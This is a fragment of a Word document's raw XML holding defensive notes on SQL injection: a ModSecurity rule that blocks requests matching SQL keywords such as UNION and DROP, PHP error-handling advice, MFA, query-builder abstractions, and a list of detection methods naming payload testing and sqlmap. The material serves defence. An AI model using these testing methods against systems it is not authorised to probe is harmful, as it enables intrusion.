      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Apache):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less</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SecRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARGS|REQUEST_HEADERS|REQUEST_URI|XML:/* "@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> \b(SELECT|INSERT|UPDATE|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DELETE)\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b.*(UNION|SELECT|--|\*/|\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bDROP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b|\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bCREATE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b)" \</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"id:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>123456,phase</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:2,deny,status:403"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRP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Error Handling and Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Displaying detailed database errors to end users can provide attackers with valuable insights into the database structure and help them craft more targeted attacks. Instead, handle errors gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C05">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>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Example (PHP Error Handling):</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try {</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 Your database query</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catch (Exception $e) {</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>error_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>($e-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)); // Log the error internally</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    echo "An error occurred. Please try again later."; // Do not expose details to the user</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C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C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Multi-Factor Authentication (MFA)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> For applications that involve sensitive data or operations (such as financial or personal data), incorporating multi-factor authentication adds an extra layer of security. Even if an attacker exploits a vulnerability like SQL injection, MFA can prevent unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE3FE2" w:rsidRDefault="00DE3FE2" w:rsidP="00DE3FE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009827B6" w:rsidRPr="00DE3FE2" w:rsidRDefault="00DE3FE2" w:rsidP="00DE3FE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>SQL Document Object Model</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE3FE2" w:rsidRPr="00DE3FE2" w:rsidRDefault="00DE3FE2" w:rsidP="00DE3FE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009827B6" w:rsidRPr="00DE3FE2" w:rsidRDefault="009827B6" w:rsidP="009827B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rong"/>
        </w:rPr>
        <w:t>Preventing SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t>: Since SQL DOM abstractions can enforce the use of parameterized queries, they often mitigate the risk of SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE3FE2" w:rsidRPr="00DE3FE2" w:rsidRDefault="00DE3FE2" w:rsidP="00DE3FE2">
      <w:p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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The term "SQL DOM" (SQL Document Object Model) typically refers to an abstraction layer for interacting with SQL databases, inspired by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Document Object Model (DOM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> used in web development (for interacting with HTML and XML documents). However, in practice, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not a universally accepted or widely used term like SQL injection or database management systems. It may be used in some contexts to describe systems that manipulate SQL queries or database data in a way similar to how DOM interacts with document structures, or it may be used to describe libraries that provide an object-oriented or programmatic way to build and manipulate SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE3FE2" w:rsidRPr="00DE3FE2" w:rsidRDefault="00DE3FE2" w:rsidP="00DE3FE2">
      <w:p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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If you're asking about </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the context of query building, dynamic query generation, or some sort of structured query abstraction, here's an explanation of how it might work:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE3FE2" w:rsidRPr="00DE3FE2" w:rsidRDefault="00DE3FE2" w:rsidP="00DE3FE2">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>What is SQL DOM in the Context of Query Building?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE3FE2" w:rsidRPr="00DE3FE2" w:rsidRDefault="00DE3FE2" w:rsidP="00DE3FE2">
      <w:p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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> might refer to an abstraction that lets you build SQL queries programmatically using objects or methods, instead of writing raw SQL strings. This could involve:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE3FE2" w:rsidRPr="00DE3FE2" w:rsidRDefault="00DE3FE2" w:rsidP="00DE3F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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Building SQL Queries Dynamically</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: By interacting with objects, methods, or attributes that represent SQL components (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE3FE2" w:rsidRPr="00DE3FE2" w:rsidRDefault="00DE3FE2" w:rsidP="00DE3F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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Improving Query Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Making it easier to manage, modify, or construct queries in an organized and structured way, similar to how DOM manipulates HTML or XML nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE3FE2" w:rsidRPr="00DE3FE2" w:rsidRDefault="00DE3FE2" w:rsidP="00DE3F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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Preventing SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Since SQL DOM abstractions can enforce the use of parameterized queries, they often mitigate the risk of SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE3FE2" w:rsidRPr="00DE3FE2" w:rsidRDefault="00DE3FE2" w:rsidP="00DE3FE2">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE3FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This kind of approach might not be a standardized term but could be realized in various query-building libraries or frameworks in different programming languages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Summary of SQL Injection Detection Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Manual Testing</w:t>
      </w:r>
      <w:r>
        <w:t>: Directly input SQL injection payloads into forms or URL parameters to observe how the application responds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Automated Scanning Tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Use tools like Burp Suite, OWASP ZAP, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to automatically test for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Error-based Detection</w:t>
      </w:r>
      <w:r>
        <w:t>: Detect SQL injection through error messages that reveal database structure or provide clues.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Blind SQL Injection Detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Use techniques like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-based or time-based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> detection for blind SQL injection scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>WAF Logs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Analyze Web Application Firewall logs for signs of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attacks or blocked requests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Database Query Analysis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Review application code for insecure SQL query construction, such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unsanitized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> user inputs being directly concatenated into queries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Response Analysis</w:t>
      </w:r>
      <w:r>
        <w:t>: Observe changes in application behavior (e.g., error messages or response times) after injecting potential SQL injection payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>By combining multiple detection methods, you can effectively identify SQL injection vulnerabilities in web applications and take steps to mitigate them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Signature and anomaly based SQL injection detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>SQL injection detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can be performed using two main approaches: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Signature-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detection and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Anomaly-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detection. These techniques are designed to identify SQL injection (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) attacks either by matching known patterns (signatures) or by identifying deviations from normal behavior (anomalies). Below is a detailed explanation of each method, with examples, advantages, and limitations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00D543D8" w:rsidP="00CE7341">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
